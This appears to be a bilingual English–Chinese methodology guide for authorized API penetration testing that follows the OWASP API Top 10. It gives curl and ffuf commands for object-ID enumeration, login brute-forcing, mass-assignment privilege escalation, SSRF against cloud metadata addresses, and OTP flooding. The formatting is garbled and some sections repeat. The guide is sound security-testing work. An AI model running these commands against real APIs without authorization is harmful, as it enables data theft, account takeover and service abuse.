Testing API Security with OWASP Top 10

基于OWASP Top 10的API安全测试

When to Use

适用场景

During authorized API penetration testing engagements
When assessing REST, GraphQL, or gRPC APIs for security vulnerabilities
Before deploying new API endpoints to production environments
When reviewing API security posture against the OWASP API Security Top 10 (2023)
For validating API gateway security controls and rate limiting effectiveness

授权的API渗透测试项目期间
评估REST、GraphQL或gRPC API的安全漏洞时
在将新API端点部署到生产环境之前
对照OWASP API安全Top 10（2023版）审查API安全状况时
验证API网关安全控制和速率限制的有效性时

Prerequisites

前置条件

Authorization: Written scope document covering all API endpoints to be tested
Burp Suite Professional: For intercepting and modifying API requests
Postman: For organizing and executing API test collections
ffuf: For API endpoint and parameter fuzzing
curl/httpie: Command-line HTTP clients for manual testing
API documentation: Swagger/OpenAPI spec, GraphQL schema, or API docs
jq: JSON processor for parsing API responses (
```
apt install jq
```
)

授权：涵盖所有待测试API端点的书面范围文档
Burp Suite Professional：用于拦截和修改API请求
Postman：用于组织和执行API测试集合
ffuf：用于API端点和参数模糊测试
curl/httpie：用于手动测试的命令行HTTP客户端
API文档：Swagger/OpenAPI规范、GraphQL schema或API文档
jq：用于解析API响应的JSON处理器（
```
apt install jq
```
）

Workflow

工作流程

Step 1: Discover and Map API Endpoints

步骤1：发现并映射API端点

Enumerate all available API endpoints and understand the API surface.

bash

undefined

枚举所有可用API端点，了解API的覆盖范围。

bash

undefined

If OpenAPI/Swagger spec is available, download it

如果有OpenAPI/Swagger规范，下载它

curl -s "https://api.target.example.com/swagger.json" | jq '.paths | keys[]' curl -s "https://api.target.example.com/v2/api-docs" | jq '.paths | keys[]' curl -s "https://api.target.example.com/openapi.yaml"

Fuzz for API endpoints

模糊测试API端点

ffuf -u "https://api.target.example.com/api/v1/FUZZ"
-w /usr/share/seclists/Discovery/Web-Content/api/api-endpoints.txt
-mc 200,201,204,301,401,403,405
-fc 404
-H "Content-Type: application/json"
-o api-enum.json -of json

Fuzz for API versions

模糊测试API版本

for v in v1 v2 v3 v4 beta internal admin; do status=$(curl -s -o /dev/null -w "%{http_code}"
"https://api.target.example.com/api/$v/users") echo "$v: $status" done

Check for GraphQL endpoint

检查GraphQL端点

for path in graphql graphiql playground query gql; do status=$(curl -s -o /dev/null -w "%{http_code}"
-X POST -H "Content-Type: application/json"
-d '{"query":"{__typename}"}'
"https://api.target.example.com/$path") echo "$path: $status" done

undefined

for path in graphql graphiql playground query gql; do status=$(curl -s -o /dev/null -w "%{http_code}"
-X POST -H "Content-Type: application/json"
-d '{"query":"{__typename}"}'
"https://api.target.example.com/$path") echo "$path: $status" done

undefined

Step 2: Test API1 - Broken Object Level Authorization (BOLA)

步骤2：测试API1 - 对象级授权失效（BOLA）

Test whether users can access objects belonging to other users by manipulating IDs.

bash

undefined

测试用户是否可以通过操纵ID来访问属于其他用户的对象。

bash

undefined

Authenticate as User A and get their resources

以用户A身份认证并获取其资源

TOKEN_A="Bearer eyJhbGciOiJIUzI1NiIs..." curl -s -H "Authorization: $TOKEN_A"
"https://api.target.example.com/api/v1/users/101/orders" | jq .

Try accessing User B's resources with User A's token

尝试使用用户A的令牌访问用户B的资源

curl -s -H "Authorization: $TOKEN_A"
"https://api.target.example.com/api/v1/users/102/orders" | jq .

Fuzz object IDs with Burp Intruder or ffuf

使用Burp Intruder或ffuf模糊测试对象ID

ffuf -u "https://api.target.example.com/api/v1/orders/FUZZ"
-w <(seq 1 1000)
-H "Authorization: $TOKEN_A"
-mc 200 -t 10 -rate 50

Test IDOR with different ID formats

使用不同ID格式测试IDOR

Numeric: /users/102

数字格式: /users/102

UUID: /users/550e8400-e29b-41d4-a716-446655440000

UUID格式: /users/550e8400-e29b-41d4-a716-446655440000

Encoded: /users/MTAy (base64)

编码格式: /users/MTAy (base64)

undefined

undefined

Step 3: Test API2 - Broken Authentication

步骤3：测试API2 - 认证机制失效

Assess authentication mechanisms for weaknesses.

bash

undefined

评估认证机制的薄弱点。

bash

undefined

Test for missing authentication

测试是否缺少认证

curl -s "https://api.target.example.com/api/v1/users" | jq .

Test JWT token vulnerabilities

测试JWT令牌漏洞

Decode JWT without verification

不验证直接解码JWT

echo "eyJhbGciOiJIUzI1NiIs..." | cut -d. -f2 | base64 -d 2>/dev/null | jq .

Test "alg: none" attack

测试"alg: none"攻击

Header: {"alg":"none","typ":"JWT"}

头部: {"alg":"none","typ":"JWT"}

Create unsigned token with modified claims

创建带有修改声明的无签名令牌

Test brute-force protection on login

测试登录接口的暴力破解防护

ffuf -u "https://api.target.example.com/api/v1/auth/login"
-X POST -H "Content-Type: application/json"
-d '{"email":"admin@target.com","password":"FUZZ"}'
-w /usr/share/seclists/Passwords/Common-Credentials/top-1000.txt
-mc 200 -t 5 -rate 10

Test password reset flow

测试密码重置流程

curl -s -X POST "https://api.target.example.com/api/v1/auth/reset"
-H "Content-Type: application/json"
-d '{"email":"victim@target.com"}'

Check if token is in response body instead of email only

检查令牌是否在响应体中，而非仅通过邮件发送

undefined

undefined

Step 4: Test API3 - Broken Object Property Level Authorization

步骤4：测试API3 - 对象属性级授权失效

Test for excessive data exposure and mass assignment vulnerabilities.

bash

undefined

测试过度数据暴露和批量赋值漏洞。

bash

undefined

Check for excessive data in responses

检查响应中的过度数据

curl -s -H "Authorization: $TOKEN_A"
"https://api.target.example.com/api/v1/users/101" | jq .

Look for: password hashes, SSNs, internal IDs, admin flags, PII

查找：密码哈希、社会安全号码(SSN)、内部ID、管理员标志、个人可识别信息(PII)

Test mass assignment - try adding admin properties

测试批量赋值 - 尝试添加管理员属性

curl -s -X PUT
-H "Authorization: $TOKEN_A"
-H "Content-Type: application/json"
-d '{"name":"Test User","role":"admin","is_admin":true}'
"https://api.target.example.com/api/v1/users/101" | jq .

Test with PATCH method

使用PATCH方法测试

curl -s -X PATCH
-H "Authorization: $TOKEN_A"
-H "Content-Type: application/json"
-d '{"role":"admin","balance":999999}'
"https://api.target.example.com/api/v1/users/101" | jq .

Check if filtering parameters expose more data

检查过滤参数是否暴露更多数据

curl -s -H "Authorization: $TOKEN_A"
"https://api.target.example.com/api/v1/users/101?fields=all" | jq . curl -s -H "Authorization: $TOKEN_A"
"https://api.target.example.com/api/v1/users/101?include=password,ssn" | jq .

undefined

curl -s -H "Authorization: $TOKEN_A"
"https://api.target.example.com/api/v1/users/101?fields=all" | jq . curl -s -H "Authorization: $TOKEN_A"
"https://api.target.example.com/api/v1/users/101?include=password,ssn" | jq .

undefined

Step 5: Test API4/API6 - Rate Limiting and Unrestricted Access to Sensitive Flows

步骤5：测试API4/API6 - 速率限制与敏感流程未受限

Verify rate limiting and resource consumption controls.

bash

undefined

验证速率限制和资源消耗控制。

bash

undefined

Test rate limiting on authentication endpoint

测试认证端点的速率限制

for i in $(seq 1 100); do status=$(curl -s -o /dev/null -w "%{http_code}"
-X POST -H "Content-Type: application/json"
-d '{"email":"test@test.com","password":"wrong"}'
"https://api.target.example.com/api/v1/auth/login") echo "Attempt $i: $status" if [ "$status" == "429" ]; then echo "Rate limited at attempt $i" break fi done

for i in $(seq 1 100); do status=$(curl -s -o /dev/null -w "%{http_code}"
-X POST -H "Content-Type: application/json"
-d '{"email":"test@test.com","password":"wrong"}'
"https://api.target.example.com/api/v1/auth/login") echo "第$i次尝试: $status" if [ "$status" == "429" ]; then echo "第$i次尝试时触发速率限制" break fi done

Test for unrestricted resource consumption

测试未受限的资源消耗

Large pagination

大量分页

curl -s -H "Authorization: $TOKEN_A"
"https://api.target.example.com/api/v1/users?limit=100000&offset=0" | jq '. | length'

GraphQL depth/complexity attack

GraphQL深度/复杂度攻击

curl -s -X POST
-H "Content-Type: application/json"
-H "Authorization: $TOKEN_A"
-d '{"query":"{ users { friends { friends { friends { friends { name } } } } } }"}'
"https://api.target.example.com/graphql"

Test SMS/email flooding via OTP endpoint

通过OTP端点测试短信/邮件轰炸

for i in $(seq 1 20); do curl -s -X POST -H "Content-Type: application/json"
-d '{"phone":"+1234567890"}'
"https://api.target.example.com/api/v1/auth/send-otp" done

undefined

for i in $(seq 1 20); do curl -s -X POST -H "Content-Type: application/json"
-d '{"phone":"+1234567890"}'
"https://api.target.example.com/api/v1/auth/send-otp" done

undefined

Step 6: Test API5 - Broken Function Level Authorization

步骤6：测试API5 - 功能级授权失效

Check for privilege escalation through administrative endpoints.

bash

undefined

检查普通用户是否可通过管理端点提升权限。

bash

undefined

Test admin endpoints with regular user token

使用普通用户令牌测试管理端点

ADMIN_ENDPOINTS=( "/api/v1/admin/users" "/api/v1/admin/settings" "/api/v1/admin/logs" "/api/v1/internal/config" "/api/v1/users?role=admin" "/api/v1/admin/export" )

for endpoint in "${ADMIN_ENDPOINTS[@]}"; do for method in GET POST PUT DELETE; do status=$(curl -s -o /dev/null -w "%{http_code}"
-X "$method"
-H "Authorization: $TOKEN_A"
-H "Content-Type: application/json"
"https://api.target.example.com$endpoint") if [ "$status" != "403" ] && [ "$status" != "401" ] && [ "$status" != "404" ]; then echo "POTENTIAL ISSUE: $method $endpoint returned $status" fi done done

ADMIN_ENDPOINTS=( "/api/v1/admin/users" "/api/v1/admin/settings" "/api/v1/admin/logs" "/api/v1/internal/config" "/api/v1/users?role=admin" "/api/v1/admin/export" )

for endpoint in "${ADMIN_ENDPOINTS[@]}"; do for method in GET POST PUT DELETE; do status=$(curl -s -o /dev/null -w "%{http_code}"
-X "$method"
-H "Authorization: $TOKEN_A"
-H "Content-Type: application/json"
"https://api.target.example.com$endpoint") if [ "$status" != "403" ] && [ "$status" != "401" ] && [ "$status" != "404" ]; then echo "潜在问题: $method $endpoint 返回状态码 $status" fi done done

Test HTTP method switching

测试HTTP方法切换

If GET /admin/users returns 403, try:

如果GET /admin/users返回403，尝试:

curl -s -X POST -H "Authorization: $TOKEN_A"
"https://api.target.example.com/api/v1/admin/users"

undefined

curl -s -X POST -H "Authorization: $TOKEN_A"
"https://api.target.example.com/api/v1/admin/users"

undefined

Step 7: Test API7-API10 - SSRF, Misconfiguration, Inventory, and Unsafe Consumption

步骤7：测试API7-API10 - SSRF、配置错误、资产管理不当和不安全的API调用

bash

undefined

bash

undefined

API7: Server-Side Request Forgery

API7: 服务器端请求伪造(SSRF)

curl -s -X POST -H "Authorization: $TOKEN_A"
-H "Content-Type: application/json"
-d '{"url":"http://169.254.169.254/latest/meta-data/"}'
"https://api.target.example.com/api/v1/fetch-url"

curl -s -X POST -H "Authorization: $TOKEN_A"
-H "Content-Type: application/json"
-d '{"webhook_url":"http://127.0.0.1:6379/"}'
"https://api.target.example.com/api/v1/webhooks"

curl -s -X POST -H "Authorization: $TOKEN_A"
-H "Content-Type: application/json"
-d '{"url":"http://169.254.169.254/latest/meta-data/"}'
"https://api.target.example.com/api/v1/fetch-url"

curl -s -X POST -H "Authorization: $TOKEN_A"
-H "Content-Type: application/json"
-d '{"webhook_url":"http://127.0.0.1:6379/"}'
"https://api.target.example.com/api/v1/webhooks"

API8: Security Misconfiguration

API8: 安全配置错误

Check CORS policy

检查CORS策略

curl -s -I -H "Origin: https://evil.example.com"
"https://api.target.example.com/api/v1/users" | grep -i "access-control"

Check for verbose error messages

检查详细错误信息

curl -s -X POST -H "Content-Type: application/json"
-d '{"invalid": "data'
"https://api.target.example.com/api/v1/users"

Check security headers

检查安全头部

API9: Improper Inventory Management

API9: 资产管理不当

Test deprecated API versions

测试已弃用的API版本

for v in v0 v1 v2 v3; do curl -s -o /dev/null -w "$v: %{http_code}\n"
"https://api.target.example.com/api/$v/users" done

API10: Unsafe Consumption of APIs

API10: 不安全的API调用

Test if the API blindly trusts third-party data

测试API是否盲目信任第三方数据

Check webhook/callback implementations for injection

检查webhook/回调实现是否存在注入风险

undefined

undefined

Key Concepts

核心概念

Concept	Description
BOLA (API1)	Broken Object Level Authorization - accessing objects belonging to other users
Broken Authentication (API2)	Weak authentication mechanisms allowing credential stuffing or token manipulation
BOPLA (API3)	Broken Object Property Level Authorization - excessive data exposure or mass assignment
Unrestricted Resource Consumption (API4)	Missing rate limiting enabling DoS or brute-force attacks
Broken Function Level Auth (API5)	Regular users accessing admin-level API functions
SSRF (API7)	Server-Side Request Forgery through API parameters accepting URLs
Security Misconfiguration (API8)	Missing security headers, verbose errors, permissive CORS
Improper Inventory (API9)	Undocumented, deprecated, or shadow API endpoints left exposed

概念	描述
BOLA (API1)	对象级授权失效 - 访问属于其他用户的对象
Broken Authentication (API2)	认证机制薄弱，允许凭证填充或令牌操纵
BOPLA (API3)	对象属性级授权失效 - 过度数据暴露或批量赋值
Unrestricted Resource Consumption (API4)	缺少速率限制，允许拒绝服务(DoS)或暴力破解攻击
Broken Function Level Auth (API5)	普通用户访问管理员级API功能
SSRF (API7)	通过接受URL的API参数实现服务器端请求伪造
Security Misconfiguration (API8)	缺少安全头部、详细错误信息、宽松的CORS策略
Improper Inventory (API9)	未公开的、已弃用的或影子API端点暴露在外

Tools & Systems

工具与系统

Tool	Purpose
Burp Suite Professional	API interception, scanning, and manual testing
Postman	API collection management and automated test execution
ffuf	API endpoint and parameter fuzzing
Kiterunner	API endpoint discovery using common API path patterns
jwt_tool	JWT token analysis, manipulation, and attack automation
GraphQL Voyager	GraphQL schema visualization and introspection analysis
Arjun	HTTP parameter discovery for API endpoints

工具	用途
Burp Suite Professional	API拦截、扫描和手动测试
Postman	API集合管理和自动化测试执行
ffuf	API端点和参数模糊测试
Kiterunner	使用常见API路径模式发现API端点
jwt_tool	JWT令牌分析、操纵和攻击自动化
GraphQL Voyager	GraphQL schema可视化和自省分析
Arjun	API端点的HTTP参数发现

Common Scenarios

常见场景

Scenario 1: BOLA in E-commerce API

场景1：电商API中的BOLA漏洞

User A can access User B's order details by changing the order ID in

/api/v1/orders/{id}

. The API only checks authentication but not authorization on the object level.

用户A可以通过修改

/api/v1/orders/{id}

中的订单ID来访问用户B的订单详情。该API仅检查认证，未在对象级别验证授权。

Scenario 2: Mass Assignment on User Profile

场景2：用户资料的批量赋值漏洞

The user update endpoint accepts a

role

field in the JSON body. By adding

"role":"admin"

to a profile update request, a regular user escalates to administrator privileges.

用户更新端点接受JSON体中的

role

字段。普通用户通过在资料更新请求中添加

"role":"admin"

，可将自身权限提升为管理员。

Scenario 3: Deprecated API Version Bypass

场景3：已弃用API版本绕过限制

The

/api/v2/users

endpoint has proper rate limiting, but

/api/v1/users

(still active) has no rate limiting. Attackers use the old version to brute-force credentials.

/api/v2/users

端点有完善的速率限制，但仍在运行的

/api/v1/users

端点无速率限制。攻击者可使用旧版本进行凭证暴力破解。

Scenario 4: GraphQL Introspection Data Leak

场景4：GraphQL自省数据泄露

GraphQL introspection is enabled in production, exposing the entire schema including internal queries, mutations, and sensitive field names that are not used in the frontend.

生产环境中启用了GraphQL自省，暴露了整个schema，包括前端未使用的内部查询、变更和敏感字段名称。

Output Format

输出格式

undefined

undefined

API Security Assessment Report

API安全评估报告

Target: api.target.example.com API Type: REST (OpenAPI 3.0) Assessment Date: 2024-01-15 OWASP API Security Top 10 (2023) Coverage

Risk	Status	Severity	Details
API1: BOLA	VULNERABLE	Critical	/api/v1/orders/{id} - IDOR confirmed
API2: Broken Auth	VULNERABLE	High	No rate limit on /auth/login
API3: BOPLA	VULNERABLE	High	User role modifiable via mass assignment
API4: Resource Consumption	VULNERABLE	Medium	No pagination limit enforced
API5: Function Level Auth	PASS	-	Admin endpoints properly restricted
API6: Unrestricted Sensitive Flows	VULNERABLE	Medium	OTP endpoint lacks rate limiting
API7: SSRF	PASS	-	URL parameters properly validated
API8: Misconfiguration	VULNERABLE	Medium	Verbose stack traces in error responses
API9: Improper Inventory	VULNERABLE	Low	API v1 still accessible without docs
API10: Unsafe Consumption	NOT TESTED	-	No third-party API integrations found

目标: api.target.example.com API类型: REST (OpenAPI 3.0) 评估日期: 2024-01-15 OWASP API安全Top 10 (2023) 覆盖情况

风险项	状态	严重程度	详情
API1: BOLA	存在漏洞	严重	/api/v1/orders/{id} - 确认存在IDOR漏洞
API2: 认证机制失效	存在漏洞	高	/auth/login端点无速率限制
API3: BOPLA	存在漏洞	高	可通过批量赋值修改用户角色
API4: 资源消耗未受限	存在漏洞	中	未强制分页限制
API5: 功能级授权失效	通过	-	管理端点已正确限制访问
API6: 敏感流程未受限	存在漏洞	中	OTP端点缺少速率限制
API7: SSRF	通过	-	URL参数已正确验证
API8: 配置错误	存在漏洞	中	错误响应中包含详细堆栈跟踪
API9: 资产管理不当	存在漏洞	低	API v1仍可访问但无文档
API10: 不安全的API调用	未测试	-	未发现第三方API集成

Critical Finding: BOLA on Orders API

严重漏洞：订单API中的BOLA

Authenticated users can access any order by iterating order IDs. Tested range: 1-1000, 847 valid orders accessible. PII exposure: names, addresses, payment details.

undefined

认证用户可通过遍历订单ID访问任意订单。测试范围：1-1000，共可访问847个有效订单。个人信息暴露：姓名、地址、支付详情。

undefined

testing-api-security-with-owasp-top-10

Original

Translation

Testing API Security with OWASP Top 10

基于OWASP Top 10的API安全测试

When to Use

适用场景

Prerequisites

前置条件

Workflow

工作流程

Step 1: Discover and Map API Endpoints

步骤1：发现并映射API端点

If OpenAPI/Swagger spec is available, download it

如果有OpenAPI/Swagger规范，下载它

Fuzz for API endpoints

模糊测试API端点

Fuzz for API versions

模糊测试API版本

Check for GraphQL endpoint

检查GraphQL端点

Step 2: Test API1 - Broken Object Level Authorization (BOLA)

步骤2：测试API1 - 对象级授权失效（BOLA）

Authenticate as User A and get their resources

以用户A身份认证并获取其资源

Try accessing User B's resources with User A's token

尝试使用用户A的令牌访问用户B的资源

Fuzz object IDs with Burp Intruder or ffuf

使用Burp Intruder或ffuf模糊测试对象ID

Test IDOR with different ID formats

使用不同ID格式测试IDOR

Numeric: /users/102

数字格式: /users/102

UUID: /users/550e8400-e29b-41d4-a716-446655440000

UUID格式: /users/550e8400-e29b-41d4-a716-446655440000

Encoded: /users/MTAy (base64)

编码格式: /users/MTAy (base64)

Step 3: Test API2 - Broken Authentication

步骤3：测试API2 - 认证机制失效

Test for missing authentication

测试是否缺少认证

Test JWT token vulnerabilities

测试JWT令牌漏洞

Decode JWT without verification

不验证直接解码JWT

Test "alg: none" attack

测试"alg: none"攻击

Header: {"alg":"none","typ":"JWT"}

头部: {"alg":"none","typ":"JWT"}

Create unsigned token with modified claims

创建带有修改声明的无签名令牌

Test brute-force protection on login

测试登录接口的暴力破解防护

Test password reset flow

测试密码重置流程

Check if token is in response body instead of email only

检查令牌是否在响应体中，而非仅通过邮件发送

Step 4: Test API3 - Broken Object Property Level Authorization

步骤4：测试API3 - 对象属性级授权失效

Check for excessive data in responses

检查响应中的过度数据

Look for: password hashes, SSNs, internal IDs, admin flags, PII

查找：密码哈希、社会安全号码(SSN)、内部ID、管理员标志、个人可识别信息(PII)

Test mass assignment - try adding admin properties

测试批量赋值 - 尝试添加管理员属性

Test with PATCH method

使用PATCH方法测试

Check if filtering parameters expose more data

检查过滤参数是否暴露更多数据

Step 5: Test API4/API6 - Rate Limiting and Unrestricted Access to Sensitive Flows

步骤5：测试API4/API6 - 速率限制与敏感流程未受限

Test rate limiting on authentication endpoint

测试认证端点的速率限制

Test for unrestricted resource consumption

测试未受限的资源消耗

Large pagination

大量分页

GraphQL depth/complexity attack

GraphQL深度/复杂度攻击

Test SMS/email flooding via OTP endpoint